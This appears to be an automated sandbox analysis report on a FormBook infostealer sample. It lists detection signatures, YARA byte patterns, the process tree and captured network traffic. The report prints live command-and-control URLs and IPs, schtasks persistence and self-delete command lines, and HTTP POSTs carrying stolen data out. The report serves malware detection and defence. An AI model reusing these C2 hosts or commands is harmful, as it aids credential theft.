Loading ...

Play interactive tourEdit tour

Analysis Report CN03716-20.exe

Overview

General Information

Sample Name:CN03716-20.exe
Analysis ID:288109
MD5:b29ab9daeda57a7b9494bf50e37b556c
SHA1:c97d6f7ebda204b6411a00e8fb3b4fd80e62cc33
SHA256:9cd82d6a35b48112a4e99f0cbdbd3a18df7738082d7f40f24274debfc5688ec4
Tags:exeFormBook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • CN03716-20.exe (PID: 5260 cmdline: 'C:\Users\user\Desktop\CN03716-20.exe' MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
    • schtasks.exe (PID: 5172 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • CN03716-20.exe (PID: 4356 cmdline: C:\Users\user\Desktop\CN03716-20.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
      • explorer.exe (PID: 3368 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6584 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6872 cmdline: /c del 'C:\Users\user\Desktop\CN03716-20.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • srmdufw81bmhwhwh.exe (PID: 4956 cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
          • schtasks.exe (PID: 6372 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A88.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • srmdufw81bmhwhwh.exe (PID: 6420 cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
          • srmdufw81bmhwhwh.exe (PID: 6408 cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
        • cmstp.exe (PID: 1548 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000002.504807087.00000000033F9000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18349:$sqlite3step: 68 34 1C 7B E1
      • 0x1845c:$sqlite3step: 68 34 1C 7B E1
      • 0x18378:$sqlite3text: 68 38 2A 90 C5
      • 0x1849d:$sqlite3text: 68 38 2A 90 C5
      • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
      00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 37 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18349:$sqlite3step: 68 34 1C 7B E1
          • 0x1845c:$sqlite3step: 68 34 1C 7B E1
          • 0x18378:$sqlite3text: 68 38 2A 90 C5
          • 0x1849d:$sqlite3text: 68 38 2A 90 C5
          • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
          30.2.srmdufw81bmhwhwh.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            30.2.srmdufw81bmhwhwh.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 7 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Scheduled temp file as task from temp locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\CN03716-20.exe' , ParentImage: C:\Users\user\Desktop\CN03716-20.exe, ParentProcessId: 5260, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp', ProcessId: 5172

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: CN03716-20.exeAvira: detected
            Antivirus detection for URL or domainShow sources
            Source: http://www.esanjor.online/cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA==Avira URL Cloud: Label: malware
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exeAvira: detection malicious, Label: TR/AD.Swotter.iznqo
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeAvira: detection malicious, Label: TR/AD.Swotter.iznqo
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeAvira: detection malicious, Label: TR/AD.Swotter.iznqo
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeVirustotal: Detection: 27%Perma Link
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeMetadefender: Detection: 13%Perma Link
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeReversingLabs: Detection: 31%
            Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exeVirustotal: Detection: 27%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exeMetadefender: Detection: 13%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exeReversingLabs: Detection: 31%
            Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exeVirustotal: Detection: 27%Perma Link
            Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exeMetadefender: Detection: 13%Perma Link
            Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exeReversingLabs: Detection: 31%
            Multi AV Scanner detection for submitted fileShow sources
            Source: CN03716-20.exeVirustotal: Detection: 27%Perma Link
            Source: CN03716-20.exeMetadefender: Detection: 13%Perma Link
            Source: CN03716-20.exeReversingLabs: Detection: 31%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: CN03716-20.exeJoe Sandbox ML: detected
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 7.2.CN03716-20.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: global trafficHTTP traffic detected: GET /cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== HTTP/1.1Host: www.esanjor.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmg/?BB=5/1mjjR4mGjOAvq4NnaV6etpsB6KL9PtiQNF/4xJREY1Y/y+fGAvCK0i83oyWJ1COzWQaYhpTQ==&M694-=yVIXBz1P HTTP/1.1Host: www.lifecoachwoman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 35.242.251.130 35.242.251.130
            Source: Joe Sandbox ViewIP Address: 35.242.251.130 35.242.251.130
            Source: Joe Sandbox ViewIP Address: 52.0.217.44 52.0.217.44
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
            Source: global trafficHTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 48 78 33 34 30 50 78 5a 66 71 32 62 67 48 4a 76 5a 77 48 37 7a 4b 4e 63 4f 6a 47 6d 33 6b 67 38 72 64 5f 63 78 73 57 58 73 6d 79 64 6d 39 47 45 61 67 68 38 55 34 4b 51 61 59 52 45 44 69 64 61 35 46 41 61 6f 38 65 75 43 51 5a 4c 44 72 52 39 41 62 59 6e 67 36 50 38 54 58 34 43 71 4b 74 52 72 47 5a 63 64 38 30 41 7a 74 62 70 49 42 62 6c 71 57 49 50 47 48 4f 56 43 36 57 4a 56 50 5f 53 37 31 43 65 64 71 63 48 5f 6a 34 64 39 68 79 45 63 56 44 55 64 52 64 41 2d 70 70 6d 73 77 6a 74 4c 52 65 58 5f 6f 74 42 78 4c 79 71 4f 77 75 56 74 38 58 37 74 33 4a 6a 4c 7e 4a 61 55 43 46 74 65 69 46 34 71 28 5f 6b 77 46 56 6d 49 4a 57 39 36 7a 35 57 48 4e 53 53 54 6a 48 55 55 36 47 6d 39 66 63 4d 65 32 71 52 4d 70 73 4c 71 59 54 61 4a 37 64 71 50 30 59 4b 36 42 78 6b 67 75 66 43 73 46 4c 74 32 73 58 28 77 32 4a 4f 67 53 6e 77 34 72 53 66 51 75 65 31 35 35 38 64 49 46 48 67 4c 32 67 6f 67 41 4b 58 50 4c 66 6a 70 78 50 37 31 6b 4f 75 6c 6c 71 49 38 35 67 45 61 45 6a 39 62 72 34 36 66 6e 70 4a 4e 4b 70 28 36 58 53 7e 4f 6a 4d 4f 46 54 5f 46 2d 6e 65 35 4a 70 44 78 45 43 39 39 68 6b 4b 41 6e 56 45 50 37 6c 68 78 5a 51 59 50 56 39 54 46 77 56 38 32 43 6e 37 36 5a 39 39 63 68 6a 54 57 75 42 74 65 6f 51 73 73 54 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: BB=xd5c9Hx340PxZfq2bgHJvZwH7zKNcOjGm3kg8rd_cxsWXsmydm9GEagh8U4KQaYREDida5FAao8euCQZLDrR9AbYng6P8TX4CqKtRrGZcd80AztbpIBblqWIPGHOVC6WJVP_S71CedqcH_j4d9hyEcVDUdRdA-ppmswjtLReX_otBxLyqOwuVt8X7t3JjL~JaUCFteiF4q(_kwFVmIJW96z5WHNSSTjHUU6Gm9fcMe2qRMpsLqYTaJ7dqP0YK6BxkgufCsFLt2sX(w2JOgSnw4rSfQue1558dIFHgL2gogAKXPLfjpxP71kOullqI85gEaEj9br46fnpJNKp(6XS~OjMOFT_F-ne5JpDxEC99hkKAnVEP7lhxZQYPV9TFwV82Cn76Z99chjTWuBteoQssTo.
            Source: global trafficHTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 165896Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 44 74 6b 36 6b 4c 67 64 74 4f 31 61 77 58 52 6c 35 42 49 71 45 53 67 4d 70 58 30 34 30 67 77 38 72 42 7a 51 55 77 45 64 73 57 79 66 6b 46 42 51 4b 67 67 6f 6b 34 4a 55 61 56 6f 59 69 47 6a 61 34 52 6d 61 6f 45 5a 67 6b 30 63 49 54 72 47 38 67 58 53 68 67 65 59 38 57 66 6e 43 4f 75 31 55 72 4b 5a 54 4a 70 79 4d 79 39 4d 75 4a 4e 49 6d 61 62 41 63 79 61 65 56 79 57 45 49 33 7a 6e 62 61 70 41 63 65 32 54 62 4b 72 41 58 4e 5a 70 4b 73 41 4c 59 2d 74 43 46 64 63 42 79 4a 52 44 69 70 70 64 49 66 77 6a 47 32 33 4d 76 5f 45 58 46 74 74 75 37 71 72 34 75 64 47 55 65 55 75 4e 76 76 66 51 7a 37 37 35 68 7a 63 49 73 75 39 6e 37 36 44 47 4a 54 41 41 42 54 4f 48 41 33 54 4e 35 50 76 33 4f 76 36 6d 61 64 31 55 4b 64 34 62 57 70 4b 50 67 73 56 41 45 4f 78 35 77 44 43 74 61 73 46 67 67 57 74 46 6e 79 65 78 65 54 7e 38 6e 74 6a 37 55 7a 4f 4f 74 49 45 69 61 4e 5a 78 39 35 4c 47 71 52 67 65 64 72 6e 6e 6e 4b 39 2d 38 43 55 69 77 31 6c 4e 49 34 41 75 45 61 46 53 39 61 71 58 37 72 50 70 4b 38 72 7a 72 34 28 67 70 65 6a 52 4d 56 44 35 50 70 48 77 35 49 4e 44 6a 68 7e 58 76 6e 6b 4b 58 45 39 48 4f 65 52 68 79 70 51 59 44 31 38 79 4e 53 64 7a 37 32 72 64 7a 37 56 66 62 53 66 38 64 75 5a 41 61 36 70 73 36 55 76 34 6e 36 33 78 28 2d 49 34 64 4e 71 66 6b 37 56 6e 38 49 57 46 4a 30 34 71 45 41 33 73 39 64 69 78 65 39 35 6e 7a 6b 57 55 30 5a 39 59 7a 31 4c 45 55 34 69 72 57 34 79 65 42 6c 68 7a 4a 36 76 69 4c 36 44 37 67 71 73 53 47 67 71 6a 46 30 4e 71 73 54 75 30 43 43 6f 49 4a 4b 43 47 35 64 74 65 48 49 4a 33 61 75 33 30 6c 77 57 34 4d 53 61 35 43 32 43 43 6e 45 49 32 43 53 4e 34 34 6b 46 65 77 65 32 4e 54 47 56 73 48 65 7e 63 6f 4a 6e 4e 50 38 52 64 68 51 48 48 54 78 72 6b 48 76 61 61 79 64 6f 35 4e 41 76 2d 35 51 44 4e 48 33 34 59 36 61 32 56 69 43 57 4e 4e 42 6d 73 73 4f 66 35 55 5f 50 39 58 41 4b 54 53 39 61 50 76 36 43 42 64 44 6d 62 4e 66 4c 77 67 6d 71 44 4b 41 4f 65 36 6c 49 35 6c 41 46 67 72 6f 55 64 41 38 71 39 76 51 6d 45 63 46 4c 79 4a 71 58 6c 7e 4a 52 34 52 53 51 72 47 66 67 32 48 4b 75 4d 39 73 7a 66 6e 5f 75 33 58 5a 4f 50 74 43 6e 4d 59 33 30 54 55 34 4b 50 4c 6b 59 64 6e 59 72 44 4f 4f 4e 7a 46 59 32 35 51 41 73 45 6b 52 6a 75 54 55 4f 54 43 2d 44 41 77 61 70 43 6f 46 30 50 48 37 39 6f 4d 43 77 73 58 39 4c 5f 66 70 59 37 31 72 4e 6e 79 74 46 61 57 73 74 4c 55 4f 28 52 4e 36 7a 62 4a 63 43 4e 54 41 6a 47 46 52 42 42 57 56 38 53 65 36 58 66 4d 6e 4a 4e 4d 53 65 5a 71 41 62 62 4c 30 43 66 65 6d 4c 46 6e 6c 6b 4e 76 67 50 31 35 70 4c 44 48 39 72 6a 42 67 51 52 67 62 64 67 57 47 28 61 51 33 4a 48 34 43 50 39 51 52 34 71 30 7
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Sep 2020 14:47:30 GMTConnection: closeContent-Length: 485Content-Encoding: gzipX-Frame-Options: SAMEORIGINCache-Control: private, no-cache, no-store, max-age=0Expires: Mon, 01 Jan 1990 0:00:00 GMTData Raw: 1f 8b 08 00 00 00 00 00 00 00 95 52 d1 6e d3 30 14 7d ef 57 78 46 e2 85 3a 4e 69 d1 46 9b 04 89 76 12 93 06 9b 46 10 e2 09 39 c9 4d e2 cd b1 83 7d 9b ac 7f 8f 93 54 5b b5 3d 20 9e ac 7b ee 39 c7 be c7 37 3a db dd 6c d3 5f b7 97 e4 4b fa f5 9a dc fe f8 7c 7d b5 25 94 71 fe 73 b9 e5 7c 97 ee a6 c6 2a 08 17 24 b5 42 3b 89 d2 68 a1 38 bf fc 46 09 ad 11 db 35 e7 7d df 07 fd 32 30 b6 e2 e9 1d af b1 51 2b ae 8c 71 10 14 58 d0 64 16 0d 10 79 6c 94 76 eb 32 8b 4f 65 a5 c8 21 33 e6 21 c8 4d c3 df 87 e1 05 2f b3 46 d1 23 d9 54 4f 64 53 b5 41 03 5c bb 37 a3 21 88 c2 1f 0d a0 20 03 81 c1 9f bd ec 62 ba 35 1a 41 23 4b 0f 2d 50 92 4f 55 4c 11 1e 71 7c d7 86 e4 b5 b0 0e 30 de 63 c9 2e 68 32 59 68 d1 40 4c 3b 09 7d 6b 2c 9e 08 7b 59 60 1d 17 d0 c9 1c d8 58 cc 89 d4 3e 04 a1 98 cb 85 82 78 31 27 7b 07 76 ac 44 e6 01 6d 88 ab ad d4 0f 0c 0d 2b 25 7a c0 5f 83 12 15 24 6f 75 e6 da 4d c4 a7 2a 52 9e 45 6a 0b e5 d3 94 32 c8 0b dd 0a 3b e5 81 35 34 e0 b8 85 4a 3a b4 c2 f2 f3 8f 8b 45 f8 21 c8 9d a3 c4 82 8a a9 c3 83 02 57 03 20 7d 65 e7 bc 5f e9 07 71 41 65 4c a5 40 b4 d2 8d b6 5e fe a9 14 8d 54 87 f8 a6 05 fd ee bb ff d7 f5 2a 0c e7 e7 61 f8 da 97 a0 cf f2 18 e1 70 71 12 f1 63 fa 99 29 0e 49 e4 72 2b 5b 3c 65 dd 8b 4e 4c a8 27 9f 31 36 eb 84 25 f9 90 31 89 09 9d 66 a0 9b 01 94 85 4f 59 96 12 ec d0 a1 9b 19 63 de 7e d2 fe c3 99 38 9b c7 f4 65 62 cf 51 75 4b bf 82 a2 00 1b dc 8f 6f fe 1f d3 ba fd 3d 01 2f b4 7c 9a 78 dc a4 64 f6 17 4c d4 8a 78 3d 03 00 00 Data Ascii: Rn0}WxF:NiFvF9M}T[= {97:l_K|}%qs|*$B;h8F5}20Q+qXdylv2Oe!3!M/F#TOdSA\7! b5A#K-POULq|0c.h2Yh@L;}k,{Y`X>x1'{vDm+%z_$ouM*REj2;54J:E!W }e_qAeL@^T*apqc)Ir+[<eNL'16%1fOYc~8ebQuKo=/|xdLx=
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Sep 2020 14:47:30 GMTConnection: closeContent-Length: 485Content-Encoding: gzipX-Frame-Options: SAMEORIGINCache-Control: private, no-cache, no-store, max-age=0Expires: Mon, 01 Jan 1990 0:00:00 GMTData Raw: 1f 8b 08 00 00 00 00 00 00 00 95 52 d1 6e d3 30 14 7d ef 57 78 46 e2 85 3a 4e 69 d1 46 9b 04 89 76 12 93 06 9b 46 10 e2 09 39 c9 4d e2 cd b1 83 7d 9b ac 7f 8f 93 54 5b b5 3d 20 9e ac 7b ee 39 c7 be c7 37 3a db dd 6c d3 5f b7 97 e4 4b fa f5 9a dc fe f8 7c 7d b5 25 94 71 fe 73 b9 e5 7c 97 ee a6 c6 2a 08 17 24 b5 42 3b 89 d2 68 a1 38 bf fc 46 09 ad 11 db 35 e7 7d df 07 fd 32 30 b6 e2 e9 1d af b1 51 2b ae 8c 71 10 14 58 d0 64 16 0d 10 79 6c 94 76 eb 32 8b 4f 65 a5 c8 21 33 e6 21 c8 4d c3 df 87 e1 05 2f b3 46 d1 23 d9 54 4f 64 53 b5 41 03 5c bb 37 a3 21 88 c2 1f 0d a0 20 03 81 c1 9f bd ec 62 ba 35 1a 41 23 4b 0f 2d 50 92 4f 55 4c 11 1e 71 7c d7 86 e4 b5 b0 0e 30 de 63 c9 2e 68 32 59 68 d1 40 4c 3b 09 7d 6b 2c 9e 08 7b 59 60 1d 17 d0 c9 1c d8 58 cc 89 d4 3e 04 a1 98 cb 85 82 78 31 27 7b 07 76 ac 44 e6 01 6d 88 ab ad d4 0f 0c 0d 2b 25 7a c0 5f 83 12 15 24 6f 75 e6 da 4d c4 a7 2a 52 9e 45 6a 0b e5 d3 94 32 c8 0b dd 0a 3b e5 81 35 34 e0 b8 85 4a 3a b4 c2 f2 f3 8f 8b 45 f8 21 c8 9d a3 c4 82 8a a9 c3 83 02 57 03 20 7d 65 e7 bc 5f e9 07 71 41 65 4c a5 40 b4 d2 8d b6 5e fe a9 14 8d 54 87 f8 a6 05 fd ee bb ff d7 f5 2a 0c e7 e7 61 f8 da 97 a0 cf f2 18 e1 70 71 12 f1 63 fa 99 29 0e 49 e4 72 2b 5b 3c 65 dd 8b 4e 4c a8 27 9f 31 36 eb 84 25 f9 90 31 89 09 9d 66 a0 9b 01 94 85 4f 59 96 12 ec d0 a1 9b 19 63 de 7e d2 fe c3 99 38 9b c7 f4 65 62 cf 51 75 4b bf 82 a2 00 1b dc 8f 6f fe 1f d3 ba fd 3d 01 2f b4 7c 9a 78 dc a4 64 f6 17 4c d4 8a 78 3d 03 00 00 Data Ascii: Rn0}WxF:NiFvF9M}T[= {97:l_K|}%qs|*$B;h8F5}20Q+qXdylv2Oe!3!M/F#TOdSA\7! b5A#K-POULq|0c.h2Yh@L;}k,{Y`X>x1'{vDm+%z_$ouM*REj2;54J:E!W }e_qAeL@^T*apqc)Ir+[<eNL'16%1fOYc~8ebQuKo=/|xdLx=
